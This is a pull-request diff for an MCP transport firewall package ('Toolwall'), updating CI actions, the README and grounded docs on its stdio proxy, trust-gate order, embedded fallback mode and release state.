### PR TITLE
feat(stdio): harden and verify the local filesystem/search boundary

### DIFF
--- a/.github/workflows/package-smoke.yml
+++ b/.github/workflows/package-smoke.yml
@@ -16,9 +16,9 @@ jobs:
       contents: read
 
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@v6
 
-      - uses: actions/setup-node@v4
+      - uses: actions/setup-node@v6
         with:
           node-version: '20'
           cache: 'npm'

--- a/README.md
+++ b/README.md
@@ -109,15 +109,15 @@ Use [docs/VERIFICATION_GUIDE.md](docs/VERIFICATION_GUIDE.md) for the full eviden
 
 ## Additional Modes
 
-### Standalone Bundled MCP Server
+### Embedded Fallback Path
 
-If you want a self-contained MCP server with bundled diagnostic tools and no downstream target, the package still supports standalone mode:
+If you want the packaged diagnostic tools without wiring a separate downstream target, the package still supports the embedded fallback path:
 
 ```bash
 npx -y mcp-transport-firewall
 ```
 
-This exposes `firewall_status` and `firewall_usage`. It is supported, but it is not the primary onboarding story for this repository.
+The normal CLI entrypoint still starts the stdio boundary. When no downstream target is configured, it falls back to the bundled `--embedded-target` path and exposes `firewall_status` and `firewall_usage`. It is supported, but it is not the primary onboarding story for this repository.
 
 ### HTTP Compatibility Harness
 
@@ -148,9 +148,9 @@ If you want a deeper operator walkthrough after the install/proof path:
 | `nhi-auth-validator` | fail-closed shared-secret authorization envelope and scope extraction | `src/middleware/nhi-auth-validator.ts` |
 | `scope-validator` | reject tool calls outside declared scopes | `src/middleware/scope-validator.ts` |
 | `color-boundary` | block mixed trust domains and session color flips | `src/middleware/color-boundary.ts` |
+| `ast-egress-filter` | deny exfiltration, sensitive-path, shell-injection, and epistemic-risk markers | `src/middleware/ast-egress-filter.ts` |
 | `preflight-validator` | require one-time preflight IDs for explicit `blue` and default high-trust tools | `src/middleware/preflight-validator.ts` |
 | `schema-validator` | enforce strict contracts for registered tool schemas | `src/middleware/schema-validator.ts` |
-| `ast-egress-filter` | deny exfiltration, sensitive-path, shell-injection, and epistemic-risk markers | `src/middleware/ast-egress-filter.ts` |
 
 ## Package Contract
 
@@ -166,7 +166,7 @@ The recommended order is:
 
 1. prove the boundary locally with `npm run demo:stdio`
 2. integrate protected downstream proxy mode in your MCP client
-3. use standalone bundled mode only when you explicitly want embedded status tools instead of a downstream target
+3. use the embedded fallback path only when you explicitly want the bundled status tools instead of another downstream target
 
 ## Docs
 

--- a/README.md
+++ b/README.md
@@ -88,7 +88,7 @@ See [docs/LIMITS_AND_NON_GOALS.md](docs/LIMITS_AND_NON_GOALS.md) for the explici
 
 - missing or invalid auth envelopes when shared-secret auth is enabled
 - scope escalation across tool boundaries
-- mixed-trust boundary violations and missing preflight for high-trust actions
+- mixed-trust boundary violations and missing preflight for explicit or default high-trust actions
 - schema-smuggled arguments on registered tool contracts
 - ShadowLeak-style exfiltration strings, sensitive paths, and shell-injection markers
 
@@ -148,7 +148,7 @@ If you want a deeper operator walkthrough after the install/proof path:
 | `nhi-auth-validator` | fail-closed shared-secret authorization envelope and scope extraction | `src/middleware/nhi-auth-validator.ts` |
 | `scope-validator` | reject tool calls outside declared scopes | `src/middleware/scope-validator.ts` |
 | `color-boundary` | block mixed trust domains and session color flips | `src/middleware/color-boundary.ts` |
-| `preflight-validator` | require one-time preflight IDs for high-trust (`blue`) actions | `src/middleware/preflight-validator.ts` |
+| `preflight-validator` | require one-time preflight IDs for explicit `blue` and default high-trust tools | `src/middleware/preflight-validator.ts` |
 | `schema-validator` | enforce strict contracts for registered tool schemas | `src/middleware/schema-validator.ts` |
 | `ast-egress-filter` | deny exfiltration, sensitive-path, shell-injection, and epistemic-risk markers | `src/middleware/ast-egress-filter.ts` |
 

--- a/README.md
+++ b/README.md
@@ -15,42 +15,9 @@
 
 `mcp-transport-firewall` sits between a coding-agent client and a local downstream MCP server. It inspects `tools/call` over `stdio`, lets read/search-shaped requests continue, and blocks risky exfiltration, path, and shell-style patterns before they reach the target.
 
-## Best For
+The primary story in this repository is one protected local filesystem/search-style workflow over `stdio`.
 
-- individual Codex and Claude Code users who already run local MCP servers
-- local MCP-enabled coding workflows that should not run high-risk calls blindly
-- file, read, list, and search-oriented downstream MCP servers
-- teams that want a fail-closed transport control before downstream execution
-
-## 60-Second Proof
-
-```bash
-npm install
-npm --prefix ui install
-npm run build
-npm run demo:stdio
-```
-
-Expected output:
-
-```text
-stdio demo passed
-allow: tool=search_files callCount=1
-cache: second response matched first response for tool=search_files
-block: ShadowLeak request denied with code=SHADOWLEAK_DETECTED
-block: missing auth denied with code=AUTH_FAILURE
-```
-
-## What This Proves
-
-- the first `search_files` request reaches the downstream target
-- the repeated allow request is served from cache
-- the risky `fetch_url` exfiltration sample is denied before downstream execution
-- the missing-auth sample is denied at the transport boundary
-
-See [docs/DEMO_RUN_TRANSCRIPT.md](docs/DEMO_RUN_TRANSCRIPT.md) for the example transcript.
-
-## Install In Your MCP Client
+## One Install Path
 
 Protected downstream proxy mode is the primary integration path.
 
@@ -70,21 +37,43 @@ Protected downstream proxy mode is the primary integration path.
 }
 ```
 
-Use `PROXY_AUTH_TOKEN` for fail-closed auth, and `MCP_TARGET_COMMAND` plus `MCP_TARGET_ARGS_JSON` as the default downstream target input. See [docs/CLIENT_CONFIG_EXAMPLES.md](docs/CLIENT_CONFIG_EXAMPLES.md) for client examples.
+Use `PROXY_AUTH_TOKEN` for fail-closed auth, and `MCP_TARGET_COMMAND` plus `MCP_TARGET_ARGS_JSON` as the default downstream target input. See [docs/CLIENT_CONFIG_EXAMPLES.md](docs/CLIENT_CONFIG_EXAMPLES.md) for the canonical client setup and the proof-only demo target variant.
 
-## Need Help Hardening A Local MCP Workflow?
+## One Proof Path
 
-Use the guided setup path when you want practical help instead of a generic feature request.
+The shortest repo-local proof path is:
 
-- guided setup for a Codex or Claude Code local MCP stack
-- workflow hardening audit for risky file, search, fetch, or execute paths
-- trust-gate tuning for a specific downstream MCP server
+```bash
+npm install
+npm run build
+npm run demo:stdio
+```
 
-Start here:
+Expected output:
 
-- read the operator guide: [docs/WORKFLOW_HARDENING.md](docs/WORKFLOW_HARDENING.md)
-- open a guided setup request: [guided setup request](https://github.com/shleder/mcp-transport-firewall/issues/new?template=guided-setup-request.yml)
-- use the scoped intake and early-operator offer details: [docs/GUIDED_SETUP_AND_AUDITS.md](docs/GUIDED_SETUP_AND_AUDITS.md)
+```text
+stdio demo passed
+allow: tool=search_files callCount=1
+cache: second response matched first response for tool=search_files
+block: ShadowLeak request denied with code=SHADOWLEAK_DETECTED
+block: missing auth denied with code=AUTH_FAILURE
+```
+
+See [docs/DEMO_RUN_TRANSCRIPT.md](docs/DEMO_RUN_TRANSCRIPT.md) for the tracked transcript and [docs/PROXY_SETUP.md](docs/PROXY_SETUP.md) for the exact proof flow.
+
+## Best For
+
+- individual Codex and Claude Code users who already run local MCP servers
+- local MCP-enabled coding workflows that should not run high-risk calls blindly
+- file, read, list, and search-oriented downstream MCP servers
+- teams that want a fail-closed transport control before downstream execution
+
+## What This Proves
+
+- the first `search_files` request reaches the downstream target
+- the repeated allow request is served from cache
+- the risky `fetch_url` exfiltration sample is denied before downstream execution
+- the missing-auth sample is denied at the transport boundary
 
 ## What This Is Not
 
@@ -104,6 +93,19 @@ See [docs/LIMITS_AND_NON_GOALS.md](docs/LIMITS_AND_NON_GOALS.md) for the explici
 - ShadowLeak-style exfiltration strings, sensitive paths, and shell-injection markers
 
 The primary inspected surface is JSON-RPC `tools/call` over `stdio`. Blocked requests fail closed and are not forwarded to the downstream target.
+
+## Full Verification Path
+
+If you want deeper proof than the short demo path:
+
+```bash
+npm run assert:package-metadata
+npm test
+npm run pack:dry-run
+npm run pack:smoke
+```
+
+Use [docs/VERIFICATION_GUIDE.md](docs/VERIFICATION_GUIDE.md) for the full evidence and verification map.
 
 ## Additional Modes
 
@@ -131,6 +133,13 @@ Control-plane endpoints:
 - [http://localhost:9090/health](http://localhost:9090/health)
 - [http://localhost:9090/metrics](http://localhost:9090/metrics)
 - [http://localhost:9090](http://localhost:9090)
+
+## Deeper Workflow Docs
+
+If you want a deeper operator walkthrough after the install/proof path:
+
+- workflow hardening guide: [docs/WORKFLOW_HARDENING.md](docs/WORKFLOW_HARDENING.md)
+- guided setup notes: [docs/GUIDED_SETUP_AND_AUDITS.md](docs/GUIDED_SETUP_AND_AUDITS.md)
 
 ## Trust Gates
 

--- a/README.md
+++ b/README.md
@@ -1,21 +1,10 @@
-# MCP Transport Firewall
+# Toolwall
 
-<p align="center">
-  <img src="docs/assets/readme-hero.svg" alt="MCP Transport Firewall wordmark" width="900" />
-</p>
+Toolwall is a fail-closed boundary for one local filesystem/search MCP workflow over `stdio`.
 
-<p align="center">
-  <strong>Fail-closed proxy for risky local MCP file/search tool calls.</strong>
-</p>
-
-<p align="center">
-  <a href="https://www.npmjs.com/package/mcp-transport-firewall"><img alt="npm version" src="https://img.shields.io/npm/v/mcp-transport-firewall?style=for-the-badge&label=npm" /></a>
-  <a href="LICENSE"><img alt="license" src="https://img.shields.io/badge/license-MIT-0f172a?style=for-the-badge" /></a>
-</p>
+The display name on this repo surface is `Toolwall`. The current npm package, repo slug, and CLI entrypoint stay `mcp-transport-firewall`.
 
 `mcp-transport-firewall` sits between a coding-agent client and a local downstream MCP server. It inspects `tools/call` over `stdio`, lets read/search-shaped requests continue, and blocks risky exfiltration, path, and shell-style patterns before they reach the target.
-
-The primary story in this repository is one protected local filesystem/search-style workflow over `stdio`.
 
 ## One Install Path
 
@@ -61,40 +50,7 @@ block: missing auth denied with code=AUTH_FAILURE
 
 See [docs/DEMO_RUN_TRANSCRIPT.md](docs/DEMO_RUN_TRANSCRIPT.md) for the tracked transcript and [docs/PROXY_SETUP.md](docs/PROXY_SETUP.md) for the exact proof flow.
 
-## Best For
-
-- individual Codex and Claude Code users who already run local MCP servers
-- local MCP-enabled coding workflows that should not run high-risk calls blindly
-- file, read, list, and search-oriented downstream MCP servers
-- teams that want a fail-closed transport control before downstream execution
-
-## What This Proves
-
-- the first `search_files` request reaches the downstream target
-- the repeated allow request is served from cache
-- the risky `fetch_url` exfiltration sample is denied before downstream execution
-- the missing-auth sample is denied at the transport boundary
-
-## What This Is Not
-
-- not a kernel, VM, or container sandbox
-- not full MCP security for every transport or deployment topology
-- not post-execution containment after a tool has already started
-- not a guarantee against every prompt-injection or semantic evasion variant
-
-See [docs/LIMITS_AND_NON_GOALS.md](docs/LIMITS_AND_NON_GOALS.md) for the explicit boundaries.
-
-## What It Blocks
-
-- missing or invalid auth envelopes when shared-secret auth is enabled
-- scope escalation across tool boundaries
-- mixed-trust boundary violations and missing preflight for explicit or default high-trust actions
-- schema-smuggled arguments on registered tool contracts
-- ShadowLeak-style exfiltration strings, sensitive paths, and shell-injection markers
-
-The primary inspected surface is JSON-RPC `tools/call` over `stdio`. Blocked requests fail closed and are not forwarded to the downstream target.
-
-## Full Verification Path
+## One Deeper Verification Path
 
 If you want deeper proof than the short demo path:
 
@@ -105,7 +61,16 @@ npm run pack:dry-run
 npm run pack:smoke
 ```
 
-Use [docs/VERIFICATION_GUIDE.md](docs/VERIFICATION_GUIDE.md) for the full evidence and verification map.
+Use [docs/VERIFICATION_GUIDE.md](docs/VERIFICATION_GUIDE.md) for the full verification map and [docs/EVIDENCE_BUNDLE.md](docs/EVIDENCE_BUNDLE.md) for the smallest tracked artifact set.
+
+## Limits And Non-Goals
+
+- not a kernel, VM, or container sandbox
+- not a broad MCP platform or hosted control plane
+- not post-execution containment after a tool has already started
+- not universal coverage for every MCP transport or custom tool contract
+
+See [docs/LIMITS_AND_NON_GOALS.md](docs/LIMITS_AND_NON_GOALS.md) for the explicit boundaries.
 
 ## Additional Modes
 
@@ -134,13 +99,6 @@ Control-plane endpoints:
 - [http://localhost:9090/metrics](http://localhost:9090/metrics)
 - [http://localhost:9090](http://localhost:9090)
 
-## Deeper Workflow Docs
-
-If you want a deeper operator walkthrough after the install/proof path:
-
-- workflow hardening guide: [docs/WORKFLOW_HARDENING.md](docs/WORKFLOW_HARDENING.md)
-- guided setup notes: [docs/GUIDED_SETUP_AND_AUDITS.md](docs/GUIDED_SETUP_AND_AUDITS.md)
-
 ## Trust Gates
 
 | Gate | Enforcement | Code |
@@ -148,7 +106,7 @@ If you want a deeper operator walkthrough after the install/proof path:
 | `nhi-auth-validator` | fail-closed shared-secret authorization envelope and scope extraction | `src/middleware/nhi-auth-validator.ts` |
 | `scope-validator` | reject tool calls outside declared scopes | `src/middleware/scope-validator.ts` |
 | `color-boundary` | block mixed trust domains and session color flips | `src/middleware/color-boundary.ts` |
-| `ast-egress-filter` | deny exfiltration, sensitive-path, shell-injection, and epistemic-risk markers | `src/middleware/ast-egress-filter.ts` |
+| `ast-egress-filter` | deny exfiltration, sensitive-path, shell-injection, and semantic-risk markers | `src/middleware/ast-egress-filter.ts` |
 | `preflight-validator` | require one-time preflight IDs for explicit `blue` and default high-trust tools | `src/middleware/preflight-validator.ts` |
 | `schema-validator` | enforce strict contracts for registered tool schemas | `src/middleware/schema-validator.ts` |
 
@@ -172,21 +130,11 @@ The recommended order is:
 
 - client setups: [docs/CLIENT_CONFIG_EXAMPLES.md](docs/CLIENT_CONFIG_EXAMPLES.md)
 - proxy setup: [docs/PROXY_SETUP.md](docs/PROXY_SETUP.md)
-- runtime contract: [docs/RUNTIME_CONTRACT.md](docs/RUNTIME_CONTRACT.md)
-- limits and non-goals: [docs/LIMITS_AND_NON_GOALS.md](docs/LIMITS_AND_NON_GOALS.md)
-- risk model: [docs/RISK_MODEL.md](docs/RISK_MODEL.md)
 - verification guide: [docs/VERIFICATION_GUIDE.md](docs/VERIFICATION_GUIDE.md)
 - evidence bundle: [docs/EVIDENCE_BUNDLE.md](docs/EVIDENCE_BUNDLE.md)
-- ship checklist: [docs/SHIP_CHECKLIST.md](docs/SHIP_CHECKLIST.md)
-- workflow hardening guide: [docs/WORKFLOW_HARDENING.md](docs/WORKFLOW_HARDENING.md)
-- guided setup and audits: [docs/GUIDED_SETUP_AND_AUDITS.md](docs/GUIDED_SETUP_AND_AUDITS.md)
-
-Reference docs:
-
+- limits and non-goals: [docs/LIMITS_AND_NON_GOALS.md](docs/LIMITS_AND_NON_GOALS.md)
+- runtime contract: [docs/RUNTIME_CONTRACT.md](docs/RUNTIME_CONTRACT.md)
+- risk model: [docs/RISK_MODEL.md](docs/RISK_MODEL.md)
+- demo transcript: [docs/DEMO_RUN_TRANSCRIPT.md](docs/DEMO_RUN_TRANSCRIPT.md)
 - benchmark guide: [docs/STDIO_BENCHMARK_GUIDE.md](docs/STDIO_BENCHMARK_GUIDE.md)
 - benchmark snapshot: [docs/STDIO_BENCHMARK_SNAPSHOT.json](docs/STDIO_BENCHMARK_SNAPSHOT.json)
-- demo transcript: [docs/DEMO_RUN_TRANSCRIPT.md](docs/DEMO_RUN_TRANSCRIPT.md)
-- architecture: [docs/ARCHITECTURE.md](docs/ARCHITECTURE.md)
-- risk summary: [docs/RISK_SUMMARY.md](docs/RISK_SUMMARY.md)
-- assurance packet: [docs/ASSURANCE_PACKET.md](docs/ASSURANCE_PACKET.md)
-- distribution notes: [docs/DISTRIBUTION_NOTES.md](docs/DISTRIBUTION_NOTES.md)

--- a/docs/ARCHITECTURE_GROUNDED.md
+++ b/docs/ARCHITECTURE_GROUNDED.md
@@ -1,0 +1,102 @@
+# Architecture Grounded
+
+Updated: 2026-04-02
+
+## Entry Points
+
+- `package.json` defines the public package contract: bin `dist/cli.js`, root export `dist/lib.js`, docs included in the tarball, and `prepare` for source installs.
+- `src/cli.ts` is the runtime entrypoint for the CLI package surface.
+- `src/lib.ts` is the library export surface for consumers that import the package directly.
+
+## Runtime Mode Selection
+
+`src/cli.ts` selects exactly one of two modes:
+
+1. no downstream target resolved: start the embedded MCP server from `src/embedded/server.ts`
+2. downstream target resolved: start the stdio firewall proxy from `src/stdio/proxy.ts`
+
+Target resolution order is implemented in `src/cli-options.ts`:
+
+- `--`
+- `--target`
+- `MCP_TARGET_COMMAND` + `MCP_TARGET_ARGS_JSON`
+- `MCP_TARGET_COMMAND` + `MCP_TARGET_ARGS`
+- `MCP_TARGET`
+- fallback to the embedded server
+
+## Stdio Proxy Path
+
+The primary execution path lives in `src/stdio/proxy.ts`.
+
+Request flow:
+
+1. spawn downstream target process
+2. read newline-delimited JSON-RPC from client stdin
+3. inspect `tools/call`
+4. enforce trust gates in this order:
+   - auth extraction and token/scope validation
+   - scope validation
+   - color-boundary validation
+   - preflight validation for blue actions
+   - strict tool-schema validation
+   - AST/egress validation
+5. serve cache hit when allowed
+6. forward allowed JSON-RPC to the downstream target
+7. sanitize downstream result or error
+8. enforce oversized-response OOM guard before returning output
+
+Non-`tools/call` JSON-RPC messages pass through the stdio proxy without trust-gate inspection, but downstream responses are still normalized through the proxy response path.
+
+## HTTP Harness Path
+
+`src/index.ts` exposes an Express-based compatibility harness:
+
+- `GET /health`
+- `POST /mcp`
+- `GET /sse`
+
+`POST /mcp` reuses the same trust-gate chain as the stdio path, then calls `routeRequest()` from `src/proxy/router.ts`.
+
+Important grounded detail:
+
+- `src/proxy/router.ts` uses an in-memory route registry
+- there are no built-in routes in the codebase
+- if no admin route has been registered, the HTTP harness fails closed with `UNKNOWN_ROUTE`
+
+So the HTTP harness is real, but it is a secondary, control-plane-configured surface rather than a ready-to-run default workflow.
+
+## Control Plane
+
+`src/admin/index.ts` owns the mutable control plane:
+
+- route registration and deletion
+- cache initialization and clearing
+- preflight registration
+- tenant rate-limit configuration
+- circuit-breaker creation
+- SIEM configuration
+- aggregated stats and Prometheus metrics
+- optional static dashboard hosting from `ui/dist`
+
+## Stateful Internals
+
+- `src/cache/index.ts` exposes a swappable global cache manager so long-lived proxy references can survive cache reinitialization
+- `src/middleware/preflight-validator.ts` keeps pending and consumed preflight IDs in memory
+- `src/proxy/router.ts` keeps route state in memory
+
+This means the current control plane is process-local and runtime-local; it is not backed by a remote control store.
+
+## Verification And Release Guardrails
+
+The current authoritative verification surfaces are:
+
+- runtime/unit tests in `tests/`
+- tarball smoke in `scripts/pack-smoke.mjs`
+- package metadata guardrails in `scripts/assert-package-metadata.mjs`
+- release/tag/origin checks in `scripts/verify-release-parity.mjs`
+- npm registry parity checks in `scripts/verify-registry-metadata.mjs`
+
+The checked-out local branch also extends the test surface with:
+
+- `tests/release-guardrails.test.ts` for package install contract assertions
+- `tests/package-proxy-smoke.test.ts` for tarball-based downstream proxy proof

--- a/docs/ARCHITECTURE_GROUNDED.md
+++ b/docs/ARCHITECTURE_GROUNDED.md
@@ -64,7 +64,7 @@ Non-`tools/call` JSON-RPC messages pass through the stdio proxy without trust-ga
 
 Important grounded detail:
 
-- `src/proxy/router.ts` uses an in-memory route registry
+- `src/proxy/router.ts` restores and updates a persisted `route-registry.json` snapshot for the HTTP/admin surface
 - there are no built-in routes in the codebase
 - if no admin route has been registered, the HTTP harness fails closed with `UNKNOWN_ROUTE`
 
@@ -87,9 +87,11 @@ So the HTTP harness is real, but it is a secondary, control-plane-configured sur
 
 - `src/cache/index.ts` exposes a swappable global cache manager so long-lived proxy references can survive cache reinitialization
 - `src/middleware/preflight-validator.ts` keeps pending and consumed preflight IDs in memory
-- `src/proxy/router.ts` keeps route state in memory
+- `src/middleware/color-boundary.ts` keeps per-session color state in memory
+- `src/middleware/rate-limiter.ts` keeps tenant override config in memory
+- `src/proxy/router.ts` keeps live route state in memory, but now backs the HTTP/admin route registry with a local `route-registry.json` snapshot under the startup cache root
 
-This means the current control plane is process-local and runtime-local; it is not backed by a remote control store.
+This means the current control plane is still local and process-scoped overall. In this batch only the HTTP/admin route registry becomes restart-durable; preflight, color sessions, and tenant rate-limit overrides remain process-local and reset on restart.
 
 ## Verification And Release Guardrails
 

--- a/docs/ARCHITECTURE_GROUNDED.md
+++ b/docs/ARCHITECTURE_GROUNDED.md
@@ -10,10 +10,10 @@ Updated: 2026-04-02
 
 ## Runtime Mode Selection
 
-`src/cli.ts` selects exactly one of two modes:
+`src/cli.ts` has two runtime codepaths:
 
-1. no downstream target resolved: start the embedded MCP server from `src/embedded/server.ts`
-2. downstream target resolved: start the stdio firewall proxy from `src/stdio/proxy.ts`
+1. explicit `--embedded-target`: start the bundled embedded MCP server from `src/embedded/server.ts`
+2. default CLI path: resolve a target and start the stdio firewall proxy from `src/stdio/proxy.ts`
 
 Target resolution order is implemented in `src/cli-options.ts`:
 
@@ -22,7 +22,12 @@ Target resolution order is implemented in `src/cli-options.ts`:
 - `MCP_TARGET_COMMAND` + `MCP_TARGET_ARGS_JSON`
 - `MCP_TARGET_COMMAND` + `MCP_TARGET_ARGS`
 - `MCP_TARGET`
-- fallback to the embedded server
+- fallback to the current package entrypoint with `--embedded-target`
+
+Grounded operator detail:
+
+- a plain `npx -y mcp-transport-firewall` invocation still enters the stdio proxy path
+- if no explicit downstream target is configured, the proxy spawns the packaged embedded server as its fallback target
 
 ## Stdio Proxy Path
 
@@ -37,9 +42,9 @@ Request flow:
    - auth extraction and token/scope validation
    - scope validation
    - color-boundary validation
-   - preflight validation for blue actions
-   - strict tool-schema validation
    - AST/egress validation
+   - preflight validation for explicit `blue` and default high-trust tools
+   - strict tool-schema validation
 5. serve cache hit when allowed
 6. forward allowed JSON-RPC to the downstream target
 7. sanitize downstream result or error

--- a/docs/CLIENT_CONFIG_EXAMPLES.md
+++ b/docs/CLIENT_CONFIG_EXAMPLES.md
@@ -1,8 +1,10 @@
 ## Client Config Examples
 
+`Toolwall` is the display name on the repo surface. The package and CLI name stay `mcp-transport-firewall`.
+
 Use this page when wiring `mcp-transport-firewall` into a local MCP setup.
 The default path is the protected downstream proxy for one local filesystem/search-style workflow.
-The primary fit is an individual Codex or Claude Code user protecting a risky local MCP workflow.
+The main fit is one protected local filesystem/search workflow over `stdio`.
 
 ## Canonical protected downstream config
 
@@ -101,5 +103,3 @@ npx --yes mcp-transport-firewall --help
 npx --yes mcp-transport-firewall
 npx --yes mcp-transport-firewall -- node C:/absolute/path/to/your-mcp-server.js
 ```
-
-If you want help adapting one of these examples to a real local MCP stack, use [Guided setup and audits](GUIDED_SETUP_AND_AUDITS.md).

--- a/docs/CLIENT_CONFIG_EXAMPLES.md
+++ b/docs/CLIENT_CONFIG_EXAMPLES.md
@@ -73,9 +73,9 @@ High-trust note:
 
 ## Secondary paths
 
-### Standalone bundled MCP server
+### Embedded fallback path
 
-Use this when you want a self-contained MCP server with `firewall_status` and `firewall_usage`.
+Use this when you want the packaged status and launch-guidance tools without configuring another downstream target.
 
 ```json
 {
@@ -90,9 +90,9 @@ Use this when you want a self-contained MCP server with `firewall_status` and `f
 
 This path:
 
-- starts the bundled standalone MCP server
-- needs no downstream target command
-- exposes runtime status and launch guidance tools immediately
+- launches the normal CLI entrypoint
+- falls back to the bundled `--embedded-target` path when no downstream target is configured
+- exposes runtime status and launch guidance tools without another target command
 
 ### Direct terminal and CLI flow
 

--- a/docs/CLIENT_CONFIG_EXAMPLES.md
+++ b/docs/CLIENT_CONFIG_EXAMPLES.md
@@ -1,24 +1,10 @@
 ## Client Config Examples
 
 Use this page when wiring `mcp-transport-firewall` into a local MCP setup.
-The default path is the protected downstream proxy.
+The default path is the protected downstream proxy for one local filesystem/search-style workflow.
 The primary fit is an individual Codex or Claude Code user protecting a risky local MCP workflow.
 
-Supported entry points:
-
-```bash
-npx -y mcp-transport-firewall
-npm install -g mcp-transport-firewall
-```
-
-Recommended order:
-
-1. protected downstream MCP server
-2. protected local read/search demo
-3. standalone bundled MCP server
-4. direct terminal and CLI flow
-
-## Protected downstream MCP server
+## Canonical protected downstream config
 
 Use this when you already have an MCP server and want the firewall in front of it.
 
@@ -47,9 +33,9 @@ Target input notes:
 
 If `PROXY_AUTH_TOKEN` is configured, client requests must carry `_meta.authorization` in the request body. See `scripts/stdio-demo.mjs` for a concrete Bearer envelope example.
 
-## Protected local read/search demo
+## Proof-only demo target
 
-Use this when you want the smallest reproducible protected workflow backed by a local read-only MCP server you control.
+Use this when you want the smallest reproducible protected workflow backed by the repo-local demo target.
 
 ```powershell
 $env:PROXY_AUTH_TOKEN = "12345678901234567890123456789012"
@@ -79,7 +65,9 @@ Example request shape:
 
 This is a demo path for proof and regression testing, not a full filesystem MCP server.
 
-## Standalone bundled MCP server
+## Secondary paths
+
+### Standalone bundled MCP server
 
 Use this when you want a self-contained MCP server with `firewall_status` and `firewall_usage`.
 
@@ -100,7 +88,7 @@ This path:
 - needs no downstream target command
 - exposes runtime status and launch guidance tools immediately
 
-## Direct terminal and CLI flow
+### Direct terminal and CLI flow
 
 ```bash
 npx --yes mcp-transport-firewall --help

--- a/docs/CLIENT_CONFIG_EXAMPLES.md
+++ b/docs/CLIENT_CONFIG_EXAMPLES.md
@@ -40,7 +40,7 @@ Use this when you want the smallest reproducible protected workflow backed by th
 ```powershell
 $env:PROXY_AUTH_TOKEN = "12345678901234567890123456789012"
 $env:MCP_TARGET_COMMAND = "node"
-$env:MCP_TARGET_ARGS_JSON = "[\"C:/absolute/path/to/your-mcp-server.js\"]"
+$env:MCP_TARGET_ARGS_JSON = "[\"C:/absolute/path/to/mcp-transport-firewall/examples/demo-target.js\"]"
 npx --yes mcp-transport-firewall
 ```
 
@@ -64,6 +64,12 @@ Example request shape:
 ```
 
 This is a demo path for proof and regression testing, not a full filesystem MCP server.
+
+High-trust note:
+
+- `execute_command`, `fetch_url`, `write_file`, `write`, and `create_file` are treated as high-trust tool families by default
+- they require a valid `preflightId` even when the caller does not mark `_meta.color` as `blue`
+- the short demo path intentionally sticks to safe `search_files`; use the benchmark corpus for the blocked high-trust path
 
 ## Secondary paths
 

--- a/docs/CURRENT_STATE_GROUNDED.md
+++ b/docs/CURRENT_STATE_GROUNDED.md
@@ -1,0 +1,100 @@
+# Current State Grounded
+
+Updated: 2026-04-02
+
+## public/current
+
+- npm `latest` is `2.2.5`
+- `npm view mcp-transport-firewall version dist-tags --json` still returns version `2.2.5` and `latest: 2.2.5`
+- latest GitHub release is `v2.2.5`, published at `2026-03-31T19:48:11Z`
+- `origin/main` is commit `597c7e3` (`ci(actions): Update workflows for Node 24 (#48)`)
+
+Grounded implication:
+
+- the public package line is still `2.2.5`
+- the public default-branch code is newer than the public package, so `public/current package` and `public/current main` are not the same thing
+
+## open/draft PR state
+
+Confirmed via local `gh` on `2026-04-02`:
+
+- `#49` draft: `docs(public): tighten human-facing security copy`
+- `#50` draft: `chore(repo): normalize public copy and verification naming`
+- `#51` draft: `ref(runtime): normalize operator-facing security language`
+- `#52` draft: `docs(support): tighten workflow intake surface`
+- `#53` draft: `docs(workflow): center proof on filesystem/search path`
+
+These PRs are public on GitHub, but they are not merged and they do not change the published npm state.
+
+## local-only
+
+- checked-out branch: `project/tests-first-quality`
+- the checked-out branch contains unpublished local work beyond `origin/main`
+- verified P5 code packet commit: `1d194f2 test(packaging): Lock packaged install contract`
+- this grounded-doc reconciliation packet is also local-only until pushed
+- separate unpublished local branch: `project/naming-and-ci-discipline` at `ebbdd73`
+
+## verified locally in the current branch
+
+- `npm run assert:package-metadata`
+- `npm test`
+- `npm run pack:dry-run`
+- `npm run pack:smoke`
+
+These checks confirm the local P5/package-install-proof code packet. They do not prove push, PR merge, release, or npm publication.
+
+## Packet Reconciliation
+
+### Already public/current
+
+- released package line `2.2.5`
+- tag `v2.2.5`
+- default branch `origin/main` at `597c7e3`
+
+### Implemented and publicly visible, but not merged
+
+- repo-baseline packet on `project/repo-baseline` / draft PR `#50`
+- runtime-language packet on `project/product-runtime-language` / draft PR `#51`
+- support-surface packet on `project/support-surface` / draft PR `#52`
+- workflow-proof packet on `project/workflow-proof` / draft PR `#53`
+- earlier public-copy cleanup on `cleanup/security-copy` / draft PR `#49`
+
+### Implemented locally, not public
+
+- naming-and-ci-discipline packet on `project/naming-and-ci-discipline`
+- first tests-first quality packet on `project/tests-first-quality`
+
+### Planned-only
+
+- `2.2.6` release/tag/publish
+- the next P5 follow-up after the first tests-first packet
+- optional GitHub metadata cleanup batch from `BD/08-ops/github-metadata-cleanup-candidates.md`
+
+Important reconciliation rule:
+
+- P1/P2 are not merely planned anymore
+- P3 is not merely planned anymore
+- P4 is not merely planned anymore
+- P5 has already started locally and must be described as local implementation, not as a plan
+
+## Docs vs Runtime/Tests
+
+### confirmed
+
+- `README.md` and `docs/RUNTIME_CONTRACT.md` still match the two-mode runtime shape in the checked-out branch: embedded standalone mode plus downstream stdio proxy mode
+- the code still supports both CLI/env target resolution and the fail-closed gate chain described in the docs
+
+### reconciled in this packet
+
+- `docs/VERIFICATION_GUIDE.md` now reflects the local verification surface in the checked-out branch
+- that local verification surface includes `scripts/assert-package-metadata.mjs`, expanded install-contract assertions in `tests/release-guardrails.test.ts`, and packaged downstream proof in `tests/package-proxy-smoke.test.ts`
+- GitHub-visible docs can still lag this local grounded packet until it is pushed
+
+### stale internal planning doc
+
+- `BD/03-current-goals/2026-03-31-next-steps-plan.md` was stale before this grounding pass because it still described P1/P2 as the active local packet and did not reflect that P3/P4 now exist as draft PRs and P5 exists locally
+
+### cannot confirm
+
+- cannot confirm any unmerged branch behavior from GitHub state alone
+- cannot confirm future `2.2.6` contents because no release/tag exists yet

--- a/docs/CURRENT_STATE_GROUNDED.md
+++ b/docs/CURRENT_STATE_GROUNDED.md
@@ -29,7 +29,7 @@ These PRs are public on GitHub, but they are not merged and they do not change t
 ## local-only
 
 - checked-out branch: `project/tests-first-quality`
-- the current checked-out tip is local-only and unpublished; re-read `git log --oneline --decorate -n 30` for the exact hash
+- the current checked-out tip is local-only and unpublished; at this review boundary it is `06e0245 docs(pr): Final review-readiness fix`
 - re-read `git status --short --branch` for the exact ahead count on the current tip
 - the intended local release-candidate boundary should keep a clean working tree
 - current local-only stack already includes:
